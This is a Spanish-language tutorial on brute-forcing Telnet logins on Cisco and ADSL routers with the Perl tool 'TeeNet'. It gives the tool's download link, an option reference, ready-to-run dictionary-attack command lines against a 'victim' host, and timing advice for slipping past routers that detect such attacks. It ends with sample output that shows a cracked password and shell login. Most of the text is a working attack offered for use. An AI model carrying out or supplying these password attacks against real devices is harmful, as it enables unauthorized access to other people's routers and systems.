Actualmente los ataques de fuerza bruta sobre el protocolo Telnet están muy restringidos debido a la poca implementación de este protocolo en la Internet moderna. Pero sigue siendo útil, dentro de unos margenes, ya que es muy usado por los Routers Cisco (Gama profesional) y los típicos Adsl (Hogares). Para que dichos ataques sean más eficientes, se deben usar varias máquinas / conexiones de forma simultanea para acelerar el proceso. En routers Cisco por defecto acepta 4 VTYs, solo se pueden hacer 4 ataques simultáneamente, también podemos encontrarnos con routers Adsl protegidos contra este tipo de ataques, es muy normal.

Para usar la fuerza bruta sobre una petición de credenciales de Telnet explicaremos el uso del script "Teenet" (www.phenoelit.de) el cual esta escrito en Perl y es muy fácil de usar como veremos.

Paquete: http://www.phenoelit.de/tn/tn

Sintaxis: tn opciones

Opciones:

-a Indica el username (login). En routers cisco y Zyxel no es necesario.

-w Archivo de diccionario a usar.

-h Hostname o IP de la victima.

-u UNIX mode. Es el usado por defecto (Pide Usuario / passowrd)

-c Cisco mode. Cuando solamente pida password (CISCO y Zyxel).

-v Muestra información de lo que hace, pero no muestra los datos recibidos.

-V Muestra información de lo que hace incluyendo los datos enviados. (Util para establecer la velocidad).

-t Límite de tiempo para la transferencia de datos (En segundos). Normalmente "0", por defecto "5".

-T Límite de tiempo para la transferencia de datos en microsegundos (millonésima parte de un segundo "µsec"). En redes Lan lo mejor es empezar a tantear a partir de 80000 µsec. Debemos tener en cuenta la opción -V para poder tantear y obtener la mayor velocidad).

-L Login pattern.Se refiere al tipo de solicitud, si no se nos solicita "login:" sino por ejemplo "username", usamos "-L 'username'".

-P Password pattern. Lo mismo que el anterior pero con la contraseña.

-S Shell pattern. Al conseguir la password comprueba que el promp de la shell coincida con el establecido por esta opción, de ser así parara, en su defecto seguirá probando hasta terminar el diccionario.

NOTA: Cuanto más tiempo (-T / -t), más espacio dejamos entre intentos, esto nos permite adecuarnos a los distintos anchos de banda, routers, etc.. Para el tema del tiempo es bueno usar la opción -V que nos dejará ver que ocurre, si ponemos poco tiempo el ataque puede ser tan rápido que al router / máquina de la víctima no le de tiempo a responder. Si nos equivocamos al poner los nombres en la opción "-L" teenet avisara con un "unknown response (not nombre)"

Ejemplos:


./tn -V -v -a busi -w passlist -h 127.0.0.1 -T 100000 -t 0
./tn -V -v -a busi -w passlist -h 127.0.0.1 -T 200000 -t 0
./tn -V -v -a busi -w passlist -h 127.0.0.1 -T 1000000 -t 0 -L "username" -P "contraseña"


El primer comando cada segundo lanza una petición, el segundo tardara el doble que el primero. En el tercero se realiza la misma petición pero destacando que NO se nos piden las credenciales con el típico "Login:" y "Password:".

./tn -V -v -a busi -w passlist -h 127.0.0.1 -T 200000 -t 3 -S "busi@busipc:~$"

En el momento de averiguar la clave, comprueba que el promp de la shell conseguida sea correspondiente a lo establecido por -S, de no ser así, seguirá probando passwords.

NOTA: Muchos routers Adsl detectan dichos ataques de diccionarios y vemos que por mucha variación de parámetros no obtenemos resultado. Veamos un ejemplo de un router que escucha en el puerto 28 y dejando 10 segundos entre envíos.


$ ./tn -V -v -a 1234 -w passlist -h 192.168.1.1 -t 10 -p 28
TN (TeeNet) - (C) 1999 by Phenoelit (http://www.phenoelit.de)
Username: 1234 Host: 192.168.1.1
Use timeout: 1s 100000ms
ogin: Got ogin:
send: 1234
---NO RESPONDE---
unknown response (not assword:)
exiting.


Veamos que resultado ofrece al encontrar la password, en este caso "erdn1su3":


....
Password: Got assword:
send: erdn1su3
---
Last login: Wed May 30 03:56:44 2007 from localhost on pts/4
Linux NASApc 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
---
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
---
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Got Last login
Password:erdn1su3
!!!